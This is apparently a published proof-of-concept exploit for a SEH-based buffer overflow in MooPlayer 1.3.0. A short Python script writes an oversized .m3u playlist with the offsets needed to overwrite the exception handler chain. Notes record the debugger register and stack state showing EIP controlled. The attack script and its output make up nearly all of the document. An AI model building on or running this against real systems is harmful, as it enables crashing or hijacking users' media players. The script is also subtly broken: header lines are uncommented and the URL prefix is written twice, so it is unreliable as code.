#!/usr/bin/env python
##########################################################################################
Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow POC
Date Discovered: 09-02-2015
Exploit Author: Samandeep Singh (@samanL33T )
Vulnerable Software: Moo player 1.3.0
Version: 1.3.0
Tested On: Windows XP SP3, Win 7 x86.
##########################################################################################
-----------------------------------NOTES----------------------------------------------#
##########################################################################################
After the execution of POC, the SEH chain looks like this:
01DDF92C ntdll.76FF71CD
01DDFF5C 43434343
42424242 *** CORRUPT ENTRY***
And the Stack
01DDFF44 41414141 AAAA
01DDFF48 41414141 AAAA
01DDFF4C 41414141 AAAA
01DDFF50 41414141 AAAA
01DDFF54 41414141 AAAA
01DDFF58 41414141 AAAA
01DDFF5C 42424242 BBBB Pointer to next SEH record
01DDFF60 43434343 CCCC SE handler
01DDFF64 00000000 …
01DDFF68 44444444 DDDD
01DDFF6C 44444444 DDDD
01DDFF70 44444444 DDDD
And the Registers
EAX 00000000
ECX 43434343
EDX 76FF71CD ntdll.76FF71CD
EBX 00000000
ESP 01DDF918
EBP 01DDF938
ESI 00000000
EDI 00000000
EIP 43434343
head="http://"
buffer=10000
junk="\x41" * 264
nseh = "\x42" * 4
seh = "\x43" * 4
poc = head + junk + nseh + seh
junk1 = "\x44"*(buffer-len(poc))
poc += junk1
file = "mooplay_poc.m3u"
f=open(file,"w")
f.write(head + poc);
f.close();
#Samandeep Singh - @samanL33T)